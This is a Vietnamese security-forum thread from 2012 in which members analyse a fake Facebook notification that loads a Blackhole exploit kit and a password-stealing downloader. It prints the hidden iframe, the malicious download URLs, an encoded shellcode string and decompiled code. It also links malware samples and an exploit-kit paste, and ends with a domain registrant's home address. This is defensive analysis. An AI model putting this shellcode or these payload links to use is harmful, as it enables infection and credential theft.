[Discussion] Một dạng fish khá mới |
13/04/2012 11:00:36 (+0700) | #1 | 261299 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Sáng nay ông anh gởi mail hỏi là tại sao Facebook báo là có người "comment" trên một topic trên FB của anh ấy nhưng khi click vào thì nó đơ đơ rồi lại quay về trang chủ FB. Ổng sợ bị dính chấu nên forward cho tớ một thông tin sau:
Troy Stein commented on your status:
"*** *** ***** ** ****"
To see the comment thread, follow the link below:
http://www.totaly.de/facebook/?profile.php&id=9037&v=feed&story_fbid=33601747715388
Thanks,
The Facebook Team
Tớ bận lắm nhưng ông anh đã nhờ rồi thì có nghĩa là ông cần cho nên tớ ráng táy máy trong giờ ăn trưa thì tìm thấy như sau.
1. www.totaly.de là một trang web có tên miền và host bên Đức. Nội dung của URL ở trên là một cái iframe (hừm.. lại iframe) như sau:
<iframe src="http://fb-sv10.co.uk/main.php?page=95fc4549d83b0486" width="0" height="0"></iframe>
<meta HTTP-EQUIV="REFRESH" content="5; url=http://facebook.com/">
Điều này chứng nó "nó" sẽ wwwect về http://facebook.com nhưng cái quan trọng là mảng http://fb-sv10.co.uk/main.php?page=95fc4549d83b0486 ở trên.
2. http://fb-sv10.co.uk/main.php?page=95fc4549d83b0486 là một trang có tên miền UK nhưng IP của nó lại là của một hosting bên Nga. Trang này có chứa thông tin sau (đã kèm).
3. Sau một hồi ráng decode (xuyên qua chạy trực tiếp) thì lòi ra một mớ functions như sau (đã đính kèm) nhưng có một đoạn:
Code:
function getShellCode() {
return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u57e9%u80fe%u2830%ue240%uebfa%ue805
%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b
%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c
%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469
%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376
%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71
%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7
%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3
%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7
%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e
%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835
%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969
%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b
%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e
%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732
%u4058%u5c5c%u1258%u0707%u4a4e%u5b05%u195e%u0618%u474b%u5d06%u0743%u065f%u4058%u1758%u154e%u184b%u4b19%u0e1d%u154d%u2819%u0028";
}
Cái đống này toàn là unicode encoded nhưng khị thử decode thằng ACSII nó ra:
Code:
䅁䅁荦ﳤ堐줱腦埩胾⠰→청ᱝ矁ꍌᡨ梣ꌤ㑘ꍾ⁞ꍎᑶ尫Л용㠽ퟗꎐᡨ滫⸑퍝Ჯ괌巌셹擃繹嶣ꌔᵜ⭐绝庣⬈ᯝ懡푩⮅ᯭ⟳
㢖�⁜⬥棲�㜓칝ꍶꍎ挤溥ퟄ౼ꌤ⯰ꏵꌬ皃篃ꎅࡀ喨ᬤ⭜쎾ꏛ⁀�ⵂ쁱ힰퟗ퇊⣀⠨瀨䉸䁨⣗⠨ꭸ絸쒣皣ꬸⷫ쯗䝀⡆䀨婝䕄흼ꬾ⃬
삣䧀ퟗ쏗쌪Ⳅ⠩ꔨబ䵚孏泯Ⰼ婞ᨛ泯Ԉ࡛䁻⣐⠨绗ꌤᯀ秡泯⠵塟届泯ⴵ䰆䑄泮ℵ焨ᠬ沠ⰵ祩⡂⡂罻⡂绗괼巨䈾笨绗䈬ꬨⓃ흻
Ȿ쌤쌪漻ឨ崨濒ឨ崨䋬䈨ퟖ⁾듀ퟖꛗ♦냄ꋖꄦ⥇ᮕꋢ㍳滮ṑܲ䁘屜ቘ܇䩎嬅ᥞؘ䝋崆ٟ݃䁘ᕎᡋ䬙ฝᕍ⠙(
Tới đây bó chiếu luôn.
Anh em nào rành cái món javascript decoding, coi thử đoạn trên nó có thể decode ra được cái gì khác không?
|
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 13:07:58 (+0700) | #2 | 261304 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Hì hì, có TQN say xỉn này liền anh. Nói ông anh anh chửi, vạch mặt thằng đó đi. Định chơi JavaScript exploit à ? Exploit đó tên JS/Exploit-Blacole.al. Bà con google ra thì thấy.
Kết quả phân tích file .php đó đây (nhờ máy làm cho khoẻ cho rồi):
http://wepawet.cs.ucsb.edu/view.php?hash=236c22c7ba122ba97cee01ee04017968&type=js
loài ra một con downloader: http://fb-sv10.co.uk/w.php?f=c01c5&e=1, được download về %Temp% dir với tên: wpbt0.dll.
Em đã chụp được em nó, đang unpack, nhưng giờ phải đi rồi.
Anh nói anh anh cô lập máy ngay, ngắt Internet ngay. Tạm thời tháo cất cái ổ cứng đó đi. Nguy hiểm. KAV 2011 của em không phát hiện ra virus trong file main.php và wpbt0.dll.
Kết quả quét = VirusTotal:
https://www.virustotal.com/file/adbb143c510ac867ef347c218d2ab5e2af031aabeeb35c9db4829c4e6c5da550/analysis/1334301244/
Nay lại lòi ra thêm cái trò comment trên FB = link exploit Integer Overflow của Firefox, browser nữa à ! Kinh thật, đúng là quá lỳ lợm, = mọi giá ! |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 13:27:49 (+0700) | #3 | 261306 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
TQN wrote:
Hì hì, có TQN say xỉn này liền anh. Nói ông anh anh chửi, vạch mặt thằng đó đi. Định chơi JavaScript exploit à ? Exploit đó tên JS/Exploit-Blacole.al. Bà con google ra thì thấy.
Kết quả phân tích file .php đó đây (nhờ máy làm cho khoẻ cho rồi):
http://wepawet.cs.ucsb.edu/view.php?hash=236c22c7ba122ba97cee01ee04017968&type=js
loài ra một con downloader: http://fb-sv10.co.uk/w.php?f=c01c5&e=1, được download về %Temp% dir với tên: wpbt0.dll.
Em đã chụp được em nó, đang unpack, nhưng giờ phải đi rồi.
Anh nói anh anh cô lập máy ngay, ngắt Internet ngay. Tạm thời tháo cất cái ổ cứng đó đi. Nguy hiểm. KAV 2011 của em không phát hiện ra virus trong file main.php và wpbt0.dll.
Nay lại lòi ra thêm cái trò comment trên FB = link exploit Integer Overflow của Firefox, browser nữa à ! Kinh thật, đúng là quá lỳ lợm, = mọi giá !
Anh chạy cái javascript deobsfucator trên FF trên Linux chỉ để decode cái mới lùng nhùng ở tầng javascript thôi em. Đến cái đoạn nó thảy wpbt0.dll vô "C:\DOCUME~1\Administrator\LOCALS~1\Temp\" thì nó không thực thi được, he he, vì Linux làm gì có C:\ đâu.
Rảnh unpack nó đi em rồi thảy lên cho bà con biết mà tránh chớ dân xài FB khá đông. Mà không hiểu sao càng gần ngày lễ lớn anh càng nhận nhiều viruses và emails dễ sợ. Mấy anh nào đó cho em xin hai chữ bình yên với , phá em hoài tội nghiệp em.
Mới thử đì ass ra cái pseudo code:
Code:
void EntryPoint(void) {
asm{ push ebp };
temp_0 = rbp;
rbp = rsp;
var_m8 = 0xdf2efc3;
*0x40b01c = 0x2bb;
if (*0x40c41c != 0x2d3c4f52) {
loc_4027c6:
asm{ adc dword [ds:0x408774], 0x40CAA9 };
*0x408770 = *0x408770 - 0x1c1d;
var_m4 = &var_m12;
*0x40b0b0 = *0x40b0b0 & 0x78e9;
*0x40c31c = &var_4;
*0x408774 = *0x408774 & 0x0;
goto loc_40280c;
}
loc_4027b2:
*0x408768 = *0x408768 | 0x40b070;
*0x40c41c = 0x0;
goto loc_4027c6;
loc_40280c:
if (!CARRY(*0x408774 - 0x18)) {
rax = *0x40c320;
if (*0x40c320 != 0x0) {
loc_402873:
*0x40ca9d = *0x40ca9d & 0x0;
goto loc_402890;
}
rax = 0x0;
rax = rax + *0x40b07c;
*0x408760 = *0x408760 + rax + CARRY(rax + *0x40b07c);
*0x40b0ac = *0x40b0ac | 0x467;
*0x40c320 = **0x40c31c;
goto loc_402873;
}
if (*0x408774 != 0x1d) {
goto loc_402801;
}
asm{ push dword [ss:ebp-0x0+var_m12] };
asm{ push 0x6A1C };
asm{ push dword [ss:ebp-0x0+var_m12] };
asm{ call dword [ds:imp_VerifyVersionInfoW] };
__FCT_PARAMETER__[0] = var_m12;
__FCT_PARAMETER__[1] = 0x6a1c;
__FCT_PARAMETER__[2] = var_m12;
loc_402801:
*0x408774 = *0x408774 + 0x1;
goto loc_40280c;
loc_402890:
if (!CARRY(*0x40ca9d - 0x1b)) {
asm{ sbb dword [ds:0x40B074], 0x40B07C };
*0x40c310 = *(*0x40c31c + 0x4);
*0x40c314 = *(*0x40c31c + 0x8);
*0x40c318 = *(*0x40c31c + 0xc);
*0x40c2e0 = *0x40c310;
*0x40c2e8 = *0x40c318;
*0x40c2e4 = *0x40c314;
*0x40c1b0 = 0x40c038;
*0x40c2ec = var_m4;
rax = fct_4029ad();
*var_m4 = **0x40c2ec;
var_m8 = 0x0;
if (*0x40c230 != var_m8) {
*0x40c228 = *0x40c228 ^ *0x40c230;
*0x40c230 = var_m8;
**0x40c31c = **0x40c31c + *0x40c228;
return;
}
else {
*0x40c228 = *0x40c230;
**0x40c31c = *0x40c320;
return;
}
}
else {
loc_40289d:
if (*0x40ca9d != 0x6) {
loc_4028ba:
if (*0x40ca9d != 0x5) {
goto loc_402882;
}
*0x40ca9d = *0x40ca9d + 0x1;
goto loc_402882;
}
asm{ push 0x37DF };
asm{ push 0x7323 };
asm{ call dword [ds:imp_GetCommProperties] };
__FCT_PARAMETER__[0] = 0x7323;
__FCT_PARAMETER__[1] = 0x37df;
goto loc_4028ba;
}
goto loc_40289d;
loc_402882:
rax = rax + 0x1;
*0x40ca9d = rax;
goto loc_402890;
}
|
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 13:34:44 (+0700) | #4 | 261307 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi.
Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này. |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 13:56:55 (+0700) | #5 | 261310 |
phanledaivuong
Member
|
0 |
|
|
Joined: 23/05/2008 17:34:21
Messages: 315
Location: /dev/null
Offline
|
|
TQN wrote:
Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi.
Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này.
Có khi gặp rồi đấy anh ạ
Hình như mấy anh đấy cũng chăm lên hva lắm, thấy 2pic này mở được 1 lúc mà click vào thì link trên đã die rồi.
Forbidden
You don't have permission to access /facebook/ on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
|
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 14:14:53 (+0700) | #6 | 261312 |
|
canh_nguyen
Elite Member
|
0 |
|
|
Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline
|
|
Thêm nội dung HTML file main cho anh em nào muốn vọc!
Nhìn đống script đến khiếp
http://pastebin.com/3BbYfFUu
Đập vào mắt đầu tiên là kiểu ob giống giống cái js ob của tụi Nga em vừa xem hôm trước:
Line: 4,5,6,7
Code:
try{new 123;}catch(fvegern){v="e"+"v"+"a";p="p"+"r"+"o"+"to";}
v+="l";
p+="type";
=> eval , prototype
Line: 10
Code:
if(fr)dd=d["getElem"+((1)?"entsB":"")+"yTagName"]("script");
=> getLementsByTagName
Line: 29
Code:
if(ch&&fr)qq2=e("q"+"q")[((ch&&fr)?"f"+"romCharC"+"o"+"de":"")];
=> fromCharCode
Line 31:
Code:
vv=a[((1)?"su":"")+"bs"+"tr"](i,2-1);
=> substr
Nó ob ác gớm nhưng chưa lẩn kinh bằng con của tụi Nga.
Tối về rảnh vọc tiếp! |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 14:19:20 (+0700) | #7 | 261313 |
|
quygia128
Member
|
0 |
|
|
Joined: 15/07/2009 20:50:28
Messages: 119
Location: Somewhere
Offline
|
|
Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao.
File ở đây:
http://www.mediafire.com/?wt99t6vpk39kasz
Pass là: malware |
|
.::Mới bắt đầu trên con đường dài::.
.::Super Newbiez::. |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 14:29:48 (+0700) | #8 | 261314 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
TQN wrote:
Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi.
Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này.
Ừa, anh cũng thấy lạ lạ vì thử bằng tay thấy nó chẳng làm khỉ gì hết.
Phải từ offset 0x5A00 không em? |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 15:27:51 (+0700) | #9 | 261319 |
|
rongchaua
Elite Member
|
0 |
|
|
Joined: 19/01/2003 04:09:23
Messages: 124
Offline
|
|
Bữa em cũng bị con này nhưng thấy AntiVir "ăn tươi, nuốt sống" nó luôn nên em không để ý. Không biết đây có phải là tấn công có chủ đích (mục tiêu riêng lẻ không). Tối nay phải về coi lại máy thôi. Kinh quá. |
|
My website: http://rongchaua.net |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 16:12:20 (+0700) | #10 | 261321 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Sao đợt này code phức tạp, mã hoá, obfuscated tùm lum vầy nè. Em có lộn không, sao lại thấy có mùi code cao cấp của hacker Nga trong đây. Chiều giờ nó quần em đuối luôn, sinh EXE trong bộ nhớ và harddisk tá lã, rồi xài code inject để download nữa. Mà lạ là cái máy cùi ngoài xưỡng em, cài MS Essential lại bắt hết.
Rầu, nhanh thiệt, mấy anh lại ngồi túc trực HVA này, em wget http://fb-sv10.co.uk/w.php?f=c01c5&e=1 không được, mấy anh chơi xoá mất tiêu rầu. Mới chưa được 2 tiếng đồng hồ.
Em lại sơ ý để MS AV xoá mất tiêu file wpbt0.dll nữa rồi. Bà con ai down kịp share lại giúp em cái ! Ngày mai em làm tiếp, làm cho ra. Giờ thì em út gọi đi nhậu mới chết, nói: em làm mồi nhậu cho anh nè, nhớ anh quá. Theo bà con thì ngồi RCE hay đi nhậu đây ? |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 16:20:07 (+0700) | #11 | 261322 |
onlyida
Member
|
0 |
|
|
Joined: 13/03/2012 06:49:27
Messages: 2
Offline
|
|
quygia128 wrote:
Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao.
File ở đây:
http://www.mediafire.com/?wt99t6vpk39kasz
Pass là: malware
Mình vừa unpack file info.exe bạn up lên, a e nào hứng thú thì cùng phân tích nhé:
http://www.mediafire.com/?68g3cqkoiqq4zf6
|
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 16:27:56 (+0700) | #12 | 261323 |
|
chiro8x
Member
|
0 |
|
|
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
|
|
"Tác giả" của mớ JScript này hầu như chẳng quan tâm nó nói điều gì cả, và cũng chẳng đụng tay vào nó trong việc làm nó trở nên khó phát hiện hơn. Tại sao lại check Platform & Browser ở client side nhỉ ?. Mấy cái function cũng lộ liễu quá . |
|
while(1){} |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 16:31:04 (+0700) | #13 | 261324 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Good job onlyida. Cậu hảy mô tả sơ sơ quá trình unpack để lấy được PE nhúng trong info.exe cho bà con biết.
Trời quơi, lại zlib/gzip nữa à. Sao mấy anh khoái dùng nó thế ! Lại cái trò lấy password lưu trong Firefox và IE nữa.
Code lên tay lắm đấy. Đạt mức cao thủ rồi đấy, vậy mới xứng đáng đồng tiền bát gạo được đầu tư chứ. Lần này build = DDK/WDK luôn à, không thèm xài Visual Studio nữa à !
Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ? |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 16:51:08 (+0700) | #14 | 261327 |
onlyida
Member
|
0 |
|
|
Joined: 13/03/2012 06:49:27
Messages: 2
Offline
|
|
TQN wrote:
Good job onlyida. Cậu hảy mô tả sơ sơ quá trình unpack để lấy được PE nhúng trong info.exe cho bà con biết.
Thực ra cũng không có gì nhiều để chia sẻ, do ko có code anti nên breakpoint ở VirtualAlloc, VirtualProtect xem nó load file gốc lên khu nào. Giải mã xong thì nó write toàn bộ trở lại imagebase, trace 1 lúc qua đoạn getprocaddress cho IAT của file gốc thì sẽ return về entrypoint => dump + fix IAT
Bạn này xem qua thì hình như lại Bot thì phải. |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 16:57:44 (+0700) | #15 | 261328 |
|
bolzano_1989
Journalist
|
0 |
|
|
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
|
|
TQN wrote:
Sao đợt này code phức tạp, mã hoá, obfuscated tùm lum vầy nè. Em có lộn không, sao lại thấy có mùi code cao cấp của hacker Nga trong đây. Chiều giờ nó quần em đuối luôn, sinh EXE trong bộ nhớ và harddisk tá lã, rồi xài code inject để download nữa. Mà lạ là cái máy cùi ngoài xưỡng em, cài MS Essential lại bắt hết.
Rầu, nhanh thiệt, mấy anh lại ngồi túc trực HVA này, em wget http://fb-sv10.co.uk/w.php?f=c01c5&e=1 không được, mấy anh chơi xoá mất tiêu rầu. Mới chưa được 2 tiếng đồng hồ.
Em lại sơ ý để MS AV xoá mất tiêu file wpbt0.dll nữa rồi. Bà con ai down kịp share lại giúp em cái ! Ngày mai em làm tiếp, làm cho ra. Giờ thì em út gọi đi nhậu mới chết, nói: em làm mồi nhậu cho anh nè, nhớ anh quá. Theo bà con thì ngồi RCE hay đi nhậu đây ?
Anh còn lưu lại hash MD5 của file wpbt0.dll đó không, CMC InfoSec sẽ tìm giúp HVA nếu có thông tin về hash file.
Encyclopedia entry: Exploit:JS/Blacole.O - Learn more about malware - Microsoft Malware Protection Center
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Exploit%3AJS%2FBlacole.O
Có vẻ có nhiều phiên bản của wpbt0.dll:
wpbt0.dll MD5:06e4528eb8a96a606ee3ea578174fd95 - VirSCAN.org 22% Scanner(s) (8/36) found malware!
http://r.virscan.org/11a26eed20fee8a6b5fa777a73a20fd4
WPBT0.DLL - Trojan.Agent/Gen-Reveton | SUPERAntiSpyware
http://www.superantispyware.com/malwarefiles/WPBT0.DLL.html
|
|
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 17:31:04 (+0700) | #16 | 261330 |
miyumi2
Member
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
Vụ mùa trồng trọt mới này coi bộ hấp dẫn à nhe
Chơi đủ loại exploit: JAVA applet; PDF exploit; HCP protocol exploit; VBS script...
Sao thấy giống giống đợt trồng trọt ở KBCHN.NET hé
Em down được 1 số file đang ngâm cứu thử, obfuscate cho dữ vào nhưng mà đường nào rồi cũng dẫn tới Roma thôi hehe |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 17:47:23 (+0700) | #17 | 261332 |
|
bolzano_1989
Journalist
|
0 |
|
|
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
|
|
quygia128 wrote:
Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao.
File ở đây:
http://www.mediafire.com/?wt99t6vpk39kasz
Pass là: malware
Sao lại có Spyeye và Zbot ở đây, stl ("Sinh Tử Lệnh") chôm hàng của hacker Nga à?
Trojan.Spyeye!conf [Symantec]
PWS-Spyeye!conf [McAfee]
TSPY_EYECONF.SM3 [Trend Micro]
Troj/SpyEyeCn-A [Sophos] |
|
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 20:08:52 (+0700) | #18 | 261337 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Quân ta bây giờ cũng đông, thiện chiến không kém gì mấy anh em kia rồi. Ha ha, say rồi, nói đùa vài câu cho vui. Giờ thì em đã yên tâm gác kiếm ! |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 21:00:56 (+0700) | #19 | 261342 |
|
vikjava
Elite Member
|
0 |
|
|
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
|
|
TQN wrote:
Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ?
để ý thì thấy anh em với nhau cả |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 22:09:30 (+0700) | #20 | 261347 |
|
bolzano_1989
Journalist
|
0 |
|
|
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
|
|
vikjava wrote:
TQN wrote:
Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ?
để ý thì thấy anh em với nhau cả
Em nghĩ là chôm hàng cả thôi, chẳng có bắt tay share nhau kỹ thuật nào với hacker quốc tế cả, cũng chẳng phải bọn Trung Quốc nốt, chỉ là người Việt Nam được nuôi béo để theo lệnh mà hãm hại người vô tội là đồng bào Việt Nam thôi .
Anh rongchaua và người anh của anh conmale đều gặp các tấn công tinh vi có chủ đích. Anh rongchaua thì đang ở nước ngoài rồi, chắc cũng được liệt vào tầm ngắm của đám Sinh Tử Lệnh này.
Theo bolzano_1989 thì đám stl ("Sinh Tử Lệnh") lần này chôm Blackhole exploit kit bản 1.2.2 (được release trong tháng 2 2012) hoặc bản 1.2.3 (được release trong tháng 3 2012):
BH EK 1.2.3 Exploit - Pastebin.com
http://pastebin.com/2LrmqiLa
Bạn đọc chú ý sẽ thấy PluginDetect version của cả bản exploit kit được dùng ở trên và Blackhole exploit kit bản 1.2.2 hoặc bản 1.2.3 đều là "0.7.6" .
Về Blackhole exploit kit, bạn đọc có thể tham khảo các tài liệu kĩ thuật sau:
Sophos Technical Paper: Exploring the Blackhole Exploit Kit, March 2012
http://sophosnews.files.wordpress.com/2012/03/blackhole_paper_mar2012.pdf
Inside Blackhole Exploit Kit HTML
http://lumenasrt.files.wordpress.com/2012/02/20120227_1436_inside_blackhole_html_v0nsch3lling.pdf |
|
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY |
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 22:58:25 (+0700) | #21 | 261350 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Đúng là HVA cao thủ nhiều như mây, toàn là ngoạ hổ tàng long. Lớp trẻ bây giờ: bolzano, miyumi, accourisct, onlyida, quygia.... sóng trẻ đè sóng già như TQN này. Từ bây giờ tôi đã an tâm rút lui, gác kiếm để lớp trẻ ra tay hiệp nghĩa tiêu diệt đám dơ bẩn stl này.
PS: Sống dai, lỳ vừa vừa chứ mấy đại ca ? |
|
|
|
|
[Discussion] Một dạng fish khá mới |
13/04/2012 23:09:38 (+0700) | #22 | 261353 |
|
rongchaua
Elite Member
|
0 |
|
|
Joined: 19/01/2003 04:09:23
Messages: 124
Offline
|
|
@bolzano: Sorry cho anh đính chính để thông tin không bị sai lệch. Anh bị dính con này
https://www.virustotal.com/file/bacab53dc8e24f0707ac93e147a71714efe9f9e6c52e10d11d93a838f815438b/analysis/
Cách thức thì cũng giống như anh của anh conmale, giả dạng notification từ facebook.
Anh của anh conmale mới có thể là tầm ngắm chứ anh thì có là gì đâu mà STL thèm để ý tới em ơi. . |
|
My website: http://rongchaua.net |
|
|
|
[Discussion] Một dạng fish khá mới |
14/04/2012 08:16:14 (+0700) | #23 | 261361 |
m3onh0x84
Member
|
0 |
|
|
Joined: 29/11/2007 15:22:21
Messages: 467
Location: lang thang 4 biển
Offline
|
|
TQN wrote:
Quân ta bây giờ cũng đông, thiện chiến không kém gì mấy anh em kia rồi. Ha ha, say rồi, nói đùa vài câu cho vui. Giờ thì em đã yên tâm gác kiếm !
theo e thấy a k0 dễ gác kiếm đc đâu, ít nhất thì làm blog share tut như a kienmanowar đã . Mà e thấy mấy bạn cố nhân này cũng chịu khó "lăn lộn" trong UG, các forum để kiếm hàng phết |
|
1/ LÀM ƠN "Đọc kĩ hướng dẫn sử dụng trước khi dùng".
2/homepage: trước khi hỏi thì LÀM ƠN tìm kiếm. Vì để biết nhiều hơn thì ai cũng phải đọc "VỪNG ƠI MỞ RA"
Hỏi FAQ thì lên asking.vn mà hỏi |
|
|
|
[Discussion] Một dạng fish khá mới |
14/04/2012 11:41:16 (+0700) | #24 | 261374 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Tớ hơi ngờ ngợ.... không thể xác định đây là "quà" mới của các bạn "đã quen" hay không . Cách giàn dựng thì na ná nhưng cấu trúc bên trong khá khác. |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Discussion] Một dạng fish khá mới |
14/04/2012 12:12:33 (+0700) | #25 | 261376 |
miyumi2
Member
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
Em mò được một số domain liên quan:
fb-sv02.com
fb-sv03.co.uk
fb-sv04.co.uk
fb-sv05.co.uk
fb-sv06.co.uk
fb-sv07.co.uk
fb-sv08.co.uk
fb-sv09.co.uk
fb-sv10.co.uk
1. Thông tin người đăng ký:
Registrant:
Annette Kathleen Fisher
Registrant type:
UK Individual
Registrant's address:
183 Albion Way
Verwood
Dorset
BH31 7LT
United Kingdom
